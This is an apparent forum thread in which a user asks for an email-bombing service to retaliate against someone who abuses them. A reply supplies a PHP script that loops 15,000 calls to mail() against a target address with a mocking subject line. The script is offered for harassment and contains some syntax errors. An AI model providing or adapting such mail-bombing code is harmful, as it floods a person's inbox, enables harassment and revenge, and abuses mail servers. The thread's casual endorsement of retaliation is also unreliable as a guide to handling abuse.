A while a go i found a link offering a email bombardment service sending one mail every 3 seconds ! I have a problem with a guy emailing me and giving abuse i wanna set him up on this but i cant find the link does anyone know of a similar link
I know how to send an email even faster than that... and I'm not going to sell it. In fact, here's some code that will work on any webserver with sendmail and PHP installed:
I'm not sure about the FROM part, I use similar code for a mail form on my site, but it just leaves the default values of [email protected]lmachine...PHP Code:<?php
for($x=0;$x<15000;$x++) {
mail("[email protected]", "Whoops j00 got pwned", "This is some spam. Eat it!", "FROM [email][email protected][/email]"); }
}
Jussssst FYI
Bookmarks